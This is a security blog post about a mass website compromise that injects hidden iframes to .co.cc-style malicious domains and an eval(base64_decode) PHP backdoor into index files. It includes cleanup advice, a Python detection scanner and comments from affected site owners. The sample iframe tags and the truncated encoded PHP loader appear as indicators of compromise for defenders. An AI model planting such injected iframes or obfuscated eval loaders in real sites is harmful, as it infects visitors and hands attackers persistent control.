The attack from the .cc domains

Over the last few days we’ve continued to see a large increase in the number of sites hacked and infected with a malicious iframe from .co.cc (.vv.cc, .cz.cc, etc.) domains.

You can run a free scan using SiteCheck to see if you’ve been infected.

This is what it looks like on a hacked site:

<iframe src="http://hgerwhu45.co.cc/QQkFBg0AAQ..=" width="1" height="1">

or

<iframe src="http://gqgqhfdjdh.co.cc/QQkFBg0AAQ..==" width="1" height="1">

The number of domains being used in this attack is quite large, and only a few of them are blacklisted by Google, but we have already identified at least these:


They change quite often, but on a hacked site the signs are the same: redirects to malicious .cc sites and the following PHP code added to index.php (along with other backdoors):

<?php eval ( base64_decode("ZXJyb3JfcmV.wb3J0aW5nKDApOw0KJGJv.dCA9IEZBTFNFIDsNC…
c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGl…
kYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW…
5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJ…

The decoded malware is available here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=d08451989a742658b8e5a8c4a3788d88

Here’s our malware definition for it: http://sucuri.net/malware/malware-entry-mwjs488

Cleaning up:

Cleaning up is not very hard: you have to remove the malicious code above from your index.php files, upgrade WordPress (Joomla, osCommerce or whatever web application you are using), change all the passwords and check for backdoors (files that you didn’t add). If you need help doing that (or need someone to do it for you), we offer website malware removal / cleanup services.
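One way to find the index files that carry the two indicators shown above, as an added example (not Sucuri's scanner and not code from the original post). The function names, the host `sample-host.vv.cc` and the sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# The two indicators shown in the post: eval(base64_decode(...)) in PHP and
# an iframe whose src host sits under .co.cc, .vv.cc or .cz.cc.
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
CC_IFRAME = re.compile(
    rb"<iframe\b[^>]*?\bsrc\s*=\s*[\"']?https?://"
    rb"([a-z0-9.-]+\.(?:co|vv|cz)\.cc)(?=[/\"'\s>:?])", re.I)

def scan_file(path):
    """Return a list of (indicator, detail) findings for one file."""
    data = Path(path).read_bytes()
    findings = [("eval-base64", "")] if EVAL_B64.search(data) else []
    findings += [("cc-iframe", m.group(1).decode().lower())
                 for m in CC_IFRAME.finditer(data)]
    return findings

def scan_webroot(root):
    """Scan every index.* file under root; return {relative path: findings}."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("index.*")):
        hits = scan_file(path) if path.is_file() else []
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def build_sample(root):
    """Write a constructed tree: two infected files, one clean, one look-alike."""
    files = {
        "index.php": b'<?php eval ( base64_decode("QUJD")); ?>\n<html></html>',
        "blog/index.html": b"<iframe src='http://sample-host.vv.cc/x' width='1'>",
        "shop/index.php": b"<?php echo 'clean'; ?>",
        # Host that only contains co.cc as an inner label: must not be flagged.
        "docs/index.html": b'<iframe src="http://a.co.cc.example.org/">',
    }
    for rel, body in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, hits in scan_webroot(tmp).items():
            print(rel, hits)
```

A hit on `eval(base64_decode(` is a lead to review by hand, since some legitimate code uses the same construct. The scan covers only index files, so the backdoor files mentioned above still have to be hunted separately.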

We will post more details/updates as we learn more.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://twitter.com/WPSecurityLock Regina Smola

    Thanks for posting the information.

    I’m seeing several sites with this same issue. I found a couple of nasty trojan horse backdoor executable programs inside various WordPress plugin folders. Example: wp-content/plugins/XML-sitemap/XML-sitemap.exe. It seems that this malware is generating .exe (backdoors) using directory names. Yikes!

  • Air360

    Thanks for posting this… I have had this attack on EVERY single site of mine… the problem I’m seeing though is that even after deleting the code, in about an hour it comes back to every site! I was simply replacing the index.php with a clean one from a clean WordPress install.
    I will now go look at my plugins, as Regina says there are some backdoors apparently.

  • http://pulse.yahoo.com/_OQYBGALLFDPP6MIGWFOCSFWE2Y Bogdan

    I can’t seem to find the backdoor (searched for .exe, .old, .bak files; also searched plugins folders and uploads folders). Once I clean the files, in several hours it gets back. It only infects index.php and index.html, basically all index files. Anyone found the form of the backdoor so far?
    I’ve changed the passwords and it doesn’t seem to be modified via FTP, since the modification date of the index.php files remains the same old one even after infection. It must be a WordPress hack.
    Thx

  • Air360

    I have not found it either. If you have multiple sites on one server, make sure it didn’t infect another site as the host and then spread across your server’s sites. I’m thinking it could be somewhere in MySQL. What I am planning on doing tonight is to set up a brand new subdomain and put a brand new clean WordPress on it and nothing else, and make sure not to visit it at all, and then monitor the source code, and once it updates with the malware, go and look at the logs and look at all the files and try and see if I can find anything in the log and any other files that were modified or messed with. Part of the problem I am having is that the sites I have on my server are all developed sites… so there is content all over the database and in the directories… so it’s hard to know what’s “wrong” and what’s still legit… so hopefully this clean test site I “hope” gets infected will help narrow it down.

  • http://pulse.yahoo.com/_LFSU4VBBYZ6XAVRIE46TVLPDEU Creatorul

    This virus is way too good, I’ve pulled my hair out but I can’t give up. Going to disable the sites one by one and see which ones have the backdoor. If the virus doesn’t get back then it means that’s the site with the backdoor. Have you noticed any pattern in making it get back? Seems to get back every 2-3 hours after I remove it.

  • http://twitter.com/MobileSnap MobileSnap.com

    I just had the same thing happen to my sites. All of my WORDPRESS sites have the cc URLs with the iframe/eval/base64 code in the index.php. I find it crazy to believe that one older version of WordPress would allow access to my server and other directories. Is this what happened? Some non-WordPress sites also have the iframe hack in them, while others do not. How do I clean it out? I’m considering just moving some over to another new fresh server. I think deleting everything is the way to go.
